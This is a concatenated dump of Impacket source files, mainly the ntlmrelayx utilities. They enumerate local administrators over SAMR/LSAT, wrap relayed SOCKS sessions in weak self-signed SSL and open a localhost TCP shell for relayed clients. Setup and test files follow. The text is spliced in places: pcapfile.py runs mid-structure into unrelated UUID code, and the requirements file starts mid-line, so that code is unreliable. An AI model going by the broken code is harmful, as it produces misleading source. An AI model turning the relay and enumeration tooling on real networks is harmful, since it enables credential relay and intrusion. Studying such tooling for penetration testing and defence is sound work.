62 | # Set the new keyword, unless it is false, then break out of the function
63 | result = self.processTunnelData(keyword, tag, data)
64 | if result is False:
65 | break
66 | # If its not false, it's a tuple with the keyword and tag
67 | keyword, tag = result
68 |
69 | if tag != '':
70 | # Store the tag in the session so we can continue
71 | tag = int(tag)
72 | if self.idleState is True:
73 | self.relaySocket.sendall('DONE%s' % EOL)
74 | self.relaySocketFile.readline()
75 |
76 | if self.shouldClose:
77 | tag += 1
78 | self.relaySocket.sendall('%s CLOSE%s' % (tag, EOL))
79 | self.relaySocketFile.readline()
80 |
81 | self.session.tagnum = tag + 1
82 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/utils/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/utils/enum.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Config utilities
11 | #
12 | # Helpful enum methods for discovering local admins through SAMR and LSAT
13 | #
14 | # Author:
15 | # Ronnie Flathers / @ropnop
16 | #
17 | from impacket.dcerpc.v5 import transport, lsat, samr, lsad
18 | from impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
19 |
20 |
21 | class EnumLocalAdmins:
22 | def __init__(self, smbConnection):
23 | self.__smbConnection = smbConnection
24 | self.__samrBinding = r'ncacn_np:445[\pipe\samr]'
25 | self.__lsaBinding = r'ncacn_np:445[\pipe\lsarpc]'
26 |
27 | def __getDceBinding(self, strBinding):
28 | rpc = transport.DCERPCTransportFactory(strBinding)
29 | rpc.set_smb_connection(self.__smbConnection)
30 | return rpc.get_dce_rpc()
31 |
32 | def getLocalAdmins(self):
33 | adminSids = self.__getLocalAdminSids()
34 | adminNames = self.__resolveSids(adminSids)
35 | return adminSids, adminNames
36 |
37 | def __getLocalAdminSids(self):
38 | dce = self.__getDceBinding(self.__samrBinding)
39 | dce.connect()
40 | dce.bind(samr.MSRPC_UUID_SAMR)
41 | resp = samr.hSamrConnect(dce)
42 | serverHandle = resp['ServerHandle']
43 |
44 | resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle, 'Builtin')
45 | resp = samr.hSamrOpenDomain(dce, serverHandle=serverHandle, domainId=resp['DomainId'])
46 | domainHandle = resp['DomainHandle']
47 | resp = samr.hSamrOpenAlias(dce, domainHandle, desiredAccess=MAXIMUM_ALLOWED, aliasId=544)
48 | resp = samr.hSamrGetMembersInAlias(dce, resp['AliasHandle'])
49 | memberSids = []
50 | for member in resp['Members']['Sids']:
51 | memberSids.append(member['SidPointer'].formatCanonical())
52 | dce.disconnect()
53 | return memberSids
54 |
55 | def __resolveSids(self, sids):
56 | dce = self.__getDceBinding(self.__lsaBinding)
57 | dce.connect()
58 | dce.bind(lsat.MSRPC_UUID_LSAT)
59 | resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)
60 | policyHandle = resp['PolicyHandle']
61 | resp = lsat.hLsarLookupSids(dce, policyHandle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)
62 | names = []
63 | for n, item in enumerate(resp['TranslatedNames']['Names']):
64 | names.append("{}\\{}".format(resp['ReferencedDomains']['Domains'][item['DomainIndex']]['Name'], item['Name']))
65 | dce.disconnect()
66 | return names
67 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/utils/ssl.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # SSL utilities
11 | #
12 | # Various functions and classes for SSL support:
13 | # - generating certificates
14 | # - creating SSL capable SOCKS protocols
15 | #
16 | # Most of the SSL generation example code comes from the pyopenssl examples
17 | # https://github.com/pyca/pyopenssl/blob/master/examples/certgen.py
18 | #
19 | # Made available under the Apache license by the pyopenssl team
20 | # See https://github.com/pyca/pyopenssl/blob/master/LICENSE
21 | #
22 | # Author:
23 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
24 | #
25 | from OpenSSL import crypto, SSL
26 | from impacket import LOG
27 |
28 | # This certificate is not supposed to be exposed on the network
29 | # but only used for the local SOCKS plugins
30 | # therefore, for now we don't bother with a CA and with hosts/hostnames matching
31 | def generateImpacketCert(certname='/tmp/impacket.crt'):
32 | # Create a private key
33 | pkey = crypto.PKey()
34 | pkey.generate_key(crypto.TYPE_RSA, 2048)
35 |
36 | # Create the certificate
37 | cert = crypto.X509()
38 | cert.gmtime_adj_notBefore(0)
39 | # Valid for 5 years
40 | cert.gmtime_adj_notAfter(60*60*24*365*5)
41 | subj = cert.get_subject()
42 | subj.CN = 'impacket'
43 | cert.set_pubkey(pkey)
44 | cert.sign(pkey, "sha256")
45 | # We write both from the same file
46 | with open(certname, 'w') as certfile:
47 | certfile.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey).decode('utf-8'))
48 | certfile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'))
49 | LOG.debug('Wrote certificate to %s' % certname)
50 |
51 | # Class to wrap the client socket in SSL when serving as a SOCKS server
52 | class SSLServerMixin(object):
53 | # This function will wrap the socksSocket in an SSL layer
54 | def wrapClientConnection(self, cert='/tmp/impacket.crt'):
55 | # Create a context, we don't really care about the SSL/TLS
56 | # versions used since it is only intended for local use and thus
57 | # doesn't have to be super-secure
58 | ctx = SSL.Context(SSL.TLS_METHOD)
59 | ctx.set_cipher_list('ALL:@SECLEVEL=0'.encode('utf-8'))
60 | try:
61 | ctx.use_privatekey_file(cert)
62 | ctx.use_certificate_file(cert)
63 | except SSL.Error:
64 | LOG.info('SSL requested - generating self-signed certificate in /tmp/impacket.crt')
65 | generateImpacketCert(cert)
66 | ctx.use_privatekey_file(cert)
67 | ctx.use_certificate_file(cert)
68 |
69 | sslSocket = SSL.Connection(ctx, self.socksSocket)
70 | sslSocket.set_accept_state()
71 |
72 | # Now set this property back to the SSL socket instead of the regular one
73 | self.socksSocket = sslSocket
74 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/utils/tcpshell.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # TCP interactive shell
11 | #
12 | # Launches a TCP shell for interactive use of clients
13 | # after successful relaying
14 | #
15 | # Author:
16 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
17 | #
18 | import socket
19 | #Default listen port
20 | port = 11000
21 | class TcpShell:
22 | def __init__(self):
23 | global port
24 | self.port = port
25 | #Increase the default port for the next attack
26 | port += 1
27 |
28 | def listen(self):
29 | #Set up the listening socket
30 | serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31 | #Bind on localhost
32 | serversocket.bind(('127.0.0.1', self.port))
33 | #Don't allow a backlog
34 | serversocket.listen(0)
35 | self.connection, host = serversocket.accept()
36 | #Create file objects from the socket
37 | self.stdin = self.connection.makefile("r")
38 | self.stdout = self.connection.makefile("w")
39 |
40 | def close(self):
41 | self.stdout.close()
42 | self.stdin.close()
43 | self.connection.close()
44 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/utils.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Utility and helper functions for the example scripts
11 | #
12 | # Author:
13 | # Martin Gallo (@martingalloar)
14 | #
15 | import re
16 |
17 |
18 | # Regular expression to parse target information
19 | target_regex = re.compile(r"(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)")
20 |
21 |
22 | # Regular expression to parse credentials information
23 | credential_regex = re.compile(r"(?:(?:([^/:]*)/)?([^:]*)(?::(.*))?)?")
24 |
25 |
26 | def parse_target(target):
27 | """ Helper function to parse target information. The expected format is:
28 |
29 | <:PASSWORD>@HOSTNAME
30 |
31 | :param target: target to parse
32 | :type target: string
33 |
34 | :return: tuple of domain, username, password and remote name or IP address
35 | :rtype: (string, string, string, string)
36 | """
37 | domain, username, password, remote_name = target_regex.match(target).groups('')
38 |
39 | # In case the password contains '@'
40 | if '@' in remote_name:
41 | password = password + '@' + remote_name.rpartition('@')[0]
42 | remote_name = remote_name.rpartition('@')[2]
43 |
44 | return domain, username, password, remote_name
45 |
46 |
47 | def parse_credentials(credentials):
48 | """ Helper function to parse credentials information. The expected format is:
49 |
50 | <:PASSWORD>
51 |
52 | :param credentials: credentials to parse
53 | :type credentials: string
54 |
55 | :return: tuple of domain, username and password
56 | :rtype: (string, string, string)
57 | """
58 | domain, username, password = credential_regex.match(credentials).groups('')
59 |
60 | return domain, username, password
61 |
--------------------------------------------------------------------------------
/impacket/impacket/krb5/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/ldap/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | pass
11 |
--------------------------------------------------------------------------------
/impacket/impacket/pcapfile.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 |
10 | from impacket import structure
11 |
12 | O_ETH = 0
13 | O_IP = 1
14 | O_ARP = 1
15 | O_UDP = 2
16 | O_TCP = 2
17 | O_ICMP = 2
18 | O_UDP_DATA = 3
19 | O_ICMP_DATA = 3
20 |
21 | MAGIC = '"\xD4\xC3\xB2\xA1'
22 |
23 | class PCapFileHeader(structure.Structure):
24 | structure = (
25 | ('magic', MAGIC),
26 | ('versionMajor', 'HHL', uuid[8:16])
37 | return '%08X-%04X-%04X-%04X-%04X%08X' % (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6)
38 |
39 |
40 | def string_to_bin(uuid):
41 | # If a UUID in the 00000000000000000000000000000000 format, let's return bytes as is
42 | if '-' not in uuid:
43 | return binascii.unhexlify(uuid)
44 |
45 | # If a UUID in the 00000000-0000-0000-0000-000000000000 format, parse it as Variant 2 UUID
46 | # The first three components of the UUID are little-endian, and the last two are big-endian
47 | matches = re.match(r"([\dA-Fa-f]{8})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})([\dA-Fa-f]{8})",
48 | uuid)
49 | (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) = [int(x, 16) for x in matches.groups()]
50 | uuid = pack('HHL', uuid4, uuid5, uuid6)
52 | return uuid
53 |
54 |
55 | def stringver_to_bin(s):
56 | (maj, min) = s.split('.')
57 | return pack('=0.2.3
5 | pycryptodomex
6 | pyOpenSSL>=21.0.0
7 | ldap3>=2.5,!=2.5.2,!=2.5.0,!=2.6
8 | ldapdomaindump>=0.9.0
9 | flask>=1.0
10 | pyreadline;sys_platform == 'win32'
11 | dsinternals
12 |
--------------------------------------------------------------------------------
/impacket/setup.cfg:
--------------------------------------------------------------------------------
1 | [egg_info]
2 | tag_build =
3 | tag_date = 0
4 |
5 |
--------------------------------------------------------------------------------
/impacket/setup.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Setup file
12 | #
13 | import glob
14 | import os
15 | import platform
16 |
17 | from setuptools import setup
18 | from subprocess import *
19 |
20 | PACKAGE_NAME = "impacket"
21 |
22 | VER_MAJOR = 0
23 | VER_MINOR = 11
24 | VER_MAINT = 0
25 | VER_PREREL = ""
26 | try:
27 | if call(["git", "branch"], stderr=STDOUT, stdout=open(os.devnull, 'w')) == 0:
28 | p = Popen("git log -1 --format=%cd --date=format:%Y%m%d.%H%M%S", shell=True, stdin=PIPE, stderr=PIPE, stdout=PIPE)
29 | (outstr, __) = p.communicate()
30 | (VER_CDATE,VER_CTIME) = outstr.strip().decode("utf-8").split('.')
31 |
32 | p = Popen("git rev-parse --short HEAD", shell=True, stdin=PIPE, stderr=PIPE, stdout=PIPE)
33 | (outstr, __) = p.communicate()
34 | VER_CHASH = outstr.strip().decode("utf-8")
35 |
36 | VER_LOCAL = "+{}.{}.{}".format(VER_CDATE, VER_CTIME, VER_CHASH)
37 | else:
38 | VER_LOCAL = ""
39 | except Exception:
40 | VER_LOCAL = ""
41 |
42 | if platform.system() != 'Darwin':
43 | data_files = [(os.path.join('share', 'doc', PACKAGE_NAME), ['README.md', 'LICENSE']+glob.glob('doc/*'))]
44 | else:
45 | data_files = []
46 |
47 |
48 | def read(fname):
49 | return open(os.path.join(os.path.dirname(__file__), fname)).read()
50 |
51 |
52 | setup(
53 | name=PACKAGE_NAME,
54 | version="{}.{}.{}".format(VER_MAJOR, VER_MINOR, VER_MAINT),
55 | description="Network protocols Constructors and Dissectors",
56 | url="https://www.coresecurity.com",
57 | author="SecureAuth Corporation",
58 | maintainer="Fortra",
59 | license="Apache modified",
60 | long_description=read('README.md'),
61 | long_description_content_type="text/markdown",
62 | platforms=["Unix", "Windows"],
63 | packages=['impacket', 'impacket.dcerpc', 'impacket.examples', 'impacket.dcerpc.v5', 'impacket.dcerpc.v5.dcom',
64 | 'impacket.krb5', 'impacket.ldap', 'impacket.examples.ntlmrelayx',
65 | 'impacket.examples.ntlmrelayx.clients', 'impacket.examples.ntlmrelayx.servers',
66 | 'impacket.examples.ntlmrelayx.servers.socksplugins', 'impacket.examples.ntlmrelayx.utils',
67 | 'impacket.examples.ntlmrelayx.attacks', 'impacket.examples.ntlmrelayx.attacks.httpattacks'],
68 | scripts=glob.glob(os.path.join('examples', '*.py')),
69 | data_files=data_files,
70 | install_requires=['pyasn1>=0.2.3', 'pycryptodomex', 'pyOpenSSL>=21.0.0', 'six', 'ldap3>=2.5,!=2.5.2,!=2.5.0,!=2.6',
71 | 'ldapdomaindump>=0.9.0', 'flask>=1.0', 'future', 'charset_normalizer', 'dsinternals'],
72 | extras_require={'pyreadline:sys_platform=="win32"': [],
73 | },
74 | classifiers=[
75 | "Programming Language :: Python :: 3.10",
76 | "Programming Language :: Python :: 3.9",
77 | "Programming Language :: Python :: 3.8",
78 | "Programming Language :: Python :: 3.7",
79 | "Programming Language :: Python :: 3.6",
80 | ]
81 | )
82 |
--------------------------------------------------------------------------------
/impacket/tests/ImpactPacket/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 |
--------------------------------------------------------------------------------
/impacket/tests/ImpactPacket/test_IP6.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket import IP6, ImpactDecoder
12 |
13 |
14 | class TestIP6(unittest.TestCase):
15 |
16 | def setUp(self):
17 | #Version 6, traffic class 72, flow label 148997, payload length 1500
18 | #next header 17 (UDP), hop limit 1
19 | #source addr FE80::78F8:89D1:30FF:256B
20 | #dest addr FF02::1:3
21 | self.binary_packet = [
22 | 0x64, 0x82, 0x46, 0x05,
23 | 0x05, 0xdc, 0x11, 0x01,
24 | 0xfe, 0x80, 0x00, 0x00,
25 | 0x00, 0x00, 0x00, 0x00,
26 | 0x78, 0xf8, 0x89, 0xd1,
27 | 0x30, 0xff, 0x25, 0x6b,
28 | 0xff, 0x02, 0x00, 0x00,
29 | 0x00, 0x00, 0x00, 0x00,
30 | 0x00, 0x00, 0x00, 0x00,
31 | 0x00, 0x01, 0x00, 0x03]
32 |
33 | def test_decoding(self):
34 | '''Test IP6 Packet decoding.'''
35 |
36 |
37 | d = ImpactDecoder.IP6Decoder()
38 | parsed_packet = d.decode(self.binary_packet)
39 |
40 | protocol_version = parsed_packet.get_ip_v()
41 | traffic_class = parsed_packet.get_traffic_class()
42 | flow_label = parsed_packet.get_flow_label()
43 | payload_length = parsed_packet.get_payload_length()
44 | next_header = parsed_packet.get_next_header()
45 | hop_limit = parsed_packet.get_hop_limit()
46 | source_address = parsed_packet.get_ip_src()
47 | destination_address = parsed_packet.get_ip_dst()
48 |
49 | self.assertEqual(protocol_version, 6, "IP6 parsing - Incorrect protocol version")
50 | self.assertEqual(traffic_class, 72, "IP6 parsing - Incorrect traffic class")
51 | self.assertEqual(flow_label, 148997, "IP6 parsing - Incorrect flow label")
52 | self.assertEqual(payload_length, 1500, "IP6 parsing - Incorrect payload length")
53 | self.assertEqual(next_header, 17, "IP6 parsing - Incorrect next header")
54 | self.assertEqual(hop_limit, 1, "IP6 parsing - Incorrect hop limit")
55 | self.assertEqual(source_address.as_string(), "FE80::78F8:89D1:30FF:256B", "IP6 parsing - Incorrect source address")
56 | self.assertEqual(destination_address.as_string(), "FF02::1:3", "IP6 parsing - Incorrect destination address")
57 |
58 | def test_creation(self):
59 | '''Test IP6 Packet creation.'''
60 |
61 | crafted_packet = IP6.IP6()
62 | crafted_packet.set_traffic_class(72)
63 | crafted_packet.set_flow_label(148997)
64 | crafted_packet.set_payload_length(1500)
65 | crafted_packet.set_next_header(17)
66 | crafted_packet.set_hop_limit(1)
67 | crafted_packet.set_ip_src("FE80::78F8:89D1:30FF:256B")
68 | crafted_packet.set_ip_dst("FF02::1:3")
69 | crafted_buffer = crafted_packet.get_bytes().tolist()
70 | self.assertEqual(crafted_buffer, self.binary_packet, "IP6 creation - Buffer mismatch")
71 |
72 |
73 | if __name__ == '__main__':
74 | unittest.main(verbosity=1)
75 |
--------------------------------------------------------------------------------
/impacket/tests/ImpactPacket/test_TCP_bug_issue7.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from threading import Thread
12 | from impacket.ImpactPacket import TCP, ImpactPacketException
13 |
14 |
15 | class TestTCP(unittest.TestCase):
16 |
17 | def setUp(self):
18 | # Dummy TCP header with "Maximum Segment Size" Option and zero length
19 | self.frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00'
20 |
21 | def test_01(self):
22 | 'Test TCP options parsing hangs'
23 | class it_hangs(Thread):
24 | def __init__(self):
25 | Thread.__init__(self)
26 | def run(self):
27 | try:
28 | frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00' \
29 | '\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00'
30 | TCP(frame)
31 | except ImpactPacketException as e:
32 | if str(e) != "'TCP Option length is too low'":
33 | raise e
34 | except Exception:
35 | pass
36 |
37 | thread_hangs = it_hangs()
38 | thread_hangs.daemon = True
39 | thread_hangs.start()
40 |
41 | thread_hangs.join(1.0) # 1 seconds timeout
42 | self.assertEqual(thread_hangs.is_alive(), False)
43 |
44 |
45 | if __name__ == '__main__':
46 | unittest.main(verbosity=1)
47 |
--------------------------------------------------------------------------------
/impacket/tests/SMB_RPC/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 |
--------------------------------------------------------------------------------
/impacket/tests/SMB_RPC/test_nmb.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | import pytest
10 | import unittest
11 | from tests import RemoteTestCase
12 |
13 | from impacket import nmb
14 | from impacket.structure import hexdump
15 |
16 |
17 | @pytest.mark.remote
18 | class NMBTests(RemoteTestCase, unittest.TestCase):
19 |
20 | def setUp(self):
21 | super(NMBTests, self).setUp()
22 | self.set_transport_config()
23 |
24 | def create_connection(self):
25 | pass
26 |
27 | def test_encodedecodename(self):
28 | name = 'THISISAVERYLONGLONGNAME'
29 | encoded = nmb.encode_name(name, nmb.TYPE_SERVER, None)
30 | hexdump(encoded)
31 | decoded = nmb.decode_name(encoded)
32 | hexdump(bytearray(decoded[1], 'utf-8'))
33 |
34 | #self.assertEqual(nmb.TYPE_SERVER, decoded[0])
35 | self.assertEqual(name[:15], decoded[1].strip())
36 |
37 | # ToDo: Fix the scope functionality
38 | #namescope = 'MYNAME'
39 | #encoded = nmb.encode_name(namescope,nmb.TYPE_SERVER,'SCOPE')
40 | #hexdump(encoded)
41 | #decoded = nmb.decode_name(encoded)
42 | #hexdump(decoded)
43 |
44 | #self.assertEqual(nmb.TYPE_SERVER, decoded[0])
45 | #self.assertEqual(namescope[:15], decoded[1].strip())
46 |
47 | def test_getnetbiosname(self):
48 | n = nmb.NetBIOS()
49 | res = n.getnetbiosname(self.machine)
50 | print(repr(res))
51 | self.assertEqual(self.serverName, res)
52 |
53 | def test_getnodestatus(self):
54 | n = nmb.NetBIOS()
55 | resp = n.getnodestatus(self.serverName.upper(), self.machine)
56 | for r in resp:
57 | r.dump()
58 | print(resp)
59 |
60 | def test_gethostbyname(self):
61 | n = nmb.NetBIOS()
62 | n.set_nameserver(self.serverName)
63 | resp = n.gethostbyname(self.serverName, nmb.TYPE_SERVER)
64 | print(resp.entries)
65 |
66 | def test_name_registration_request(self):
67 | n = nmb.NetBIOS()
68 | # ToDo: Look at this
69 | #resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1')
70 | try:
71 | resp = n.name_registration_request('*JSMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_ONT_P, '1.1.1.2')
72 | resp.dump()
73 | except Exception as e:
74 | print(str(e))
75 | if str(e).find('NETBIOS') <= 0:
76 | raise e
77 |
78 | def test_name_query_request(self):
79 | n = nmb.NetBIOS()
80 | # ToDo: Look at this
81 | # resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1')
82 | resp = n.name_query_request(self.serverName, self.machine)
83 | print(resp.entries)
84 |
85 |
86 | if __name__ == "__main__":
87 | unittest.main(verbosity=1)
88 |
--------------------------------------------------------------------------------
/impacket/tests/SMB_RPC/test_spnego.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | import unittest
10 | from impacket import smb
11 |
12 |
13 | class Test(unittest.TestCase):
14 |
15 | def setUp(self):
16 | self.negTokenInit = b'\x60\x28\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x1e\x30\x1c\xa0\x1a\x30\x18\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a'
17 |
18 | self.negTokenInit2 = b'\x60\x4d\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x43\x30\x41\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2f\x04\x2d\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x15\x82\x08\x60\x09\x00\x09\x00\x20\x00\x00\x00\x04\x00\x04\x00\x29\x00\x00\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55\x50\x4a\x41\x43\x4b'
19 |
20 | self.negTokenResp1 = b'\xa1\x82\x01\x0b\x30\x82\x01\x07\xa0\x03\x0a\x01\x01\xa1\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x81\xf1\x04\x81\xee\x4e\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00\x00\x1e\x00\x1e\x00\x38\x00\x00\x00\x15\x82\x8a\x62\x29\x93\x18\x15\x3d\x3b\x0d\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x98\x00\x56\x00\x00\x00\x06\x01\xb1\x1d\x00\x00\x00\x0f\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x02\x00\x1e\x00\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x01\x00\x1e\x00\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x04\x00\x1e\x00\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x03\x00\x1e\x00\x57\x00\x49\x00\x4e\x00\x2d\x00\x41\x00\x36\x00\x4b\x00\x50\x00\x55\x00\x30\x00\x54\x00\x31\x00\x52\x00\x36\x00\x53\x00\x07\x00\x08\x00\x52\xe8\x2b\x20\x70\x30\xcd\x01\x00\x00\x00\x00'
21 |
22 | self.negTokenResp2 = b'\xa1\x81\xab\x30\x81\xa8\xa2\x81\xa5\x04\x81\xa2\x4e\x54\x4c\x4d\x53\x53\x50\x00\x03\x00\x00\x00\x18\x00\x18\x00\x40\x00\x00\x00\x18\x00\x18\x00\x58\x00\x00\x00\x12\x00\x12\x00\x70\x00\x00\x00\x08\x00\x08\x00\x82\x00\x00\x00\x08\x00\x08\x00\x8a\x00\x00\x00\x10\x00\x10\x00\x92\x00\x00\x00\x15\x82\x08\x60\x24\x7f\xec\x6e\x53\x09\x86\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x99\x24\xd3\x12\xd5\x95\xe1\x33\xba\xfa\x00\x3e\xe3\xfd\x58\x63\xbd\x3e\x83\x0d\x4e\x71\xdc\x57\x00\x4f\x00\x52\x00\x4b\x00\x47\x00\x52\x00\x4f\x00\x55\x00\x50\x00\x74\x00\x65\x00\x73\x00\x74\x00\x4a\x00\x41\x00\x43\x00\x4b\x00\x32\xd2\x67\xd6\xa5\xa9\x4b\x97\x2a\xaf\x45\xee\x87\x58\x0c\x6d'
23 |
24 | self.negTokenResp3 = b'\xa1\x07\x30\x05\xa0\x03\x0a\x01\x00'
25 |
26 | self.negTokenResp4 = b'\xa1\x15\x30\x13\xa0\x03\x0a\x01\x03\xa1\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a'
27 |
28 | def test_negTokenInit(self):
29 | token = smb.SPNEGO_NegTokenInit()
30 | token.fromString(self.negTokenInit)
31 | self.assertEqual(self.negTokenInit, token.getData())
32 |
33 | def test_negTokenInit2(self):
34 | token = smb.SPNEGO_NegTokenInit()
35 | token.fromString(self.negTokenInit2)
36 | self.assertEqual(self.negTokenInit2, token.getData())
37 |
38 | def test_negTokenResp1(self):
39 | token = smb.SPNEGO_NegTokenResp()
40 | token.fromString(self.negTokenResp1)
41 | self.assertEqual(self.negTokenResp1, token.getData())
42 |
43 | def test_negTokenResp2(self):
44 | token = smb.SPNEGO_NegTokenResp()
45 | token.fromString(self.negTokenResp2)
46 | self.assertEqual(self.negTokenResp2, token.getData())
47 |
48 | def test_negTokenResp3(self):
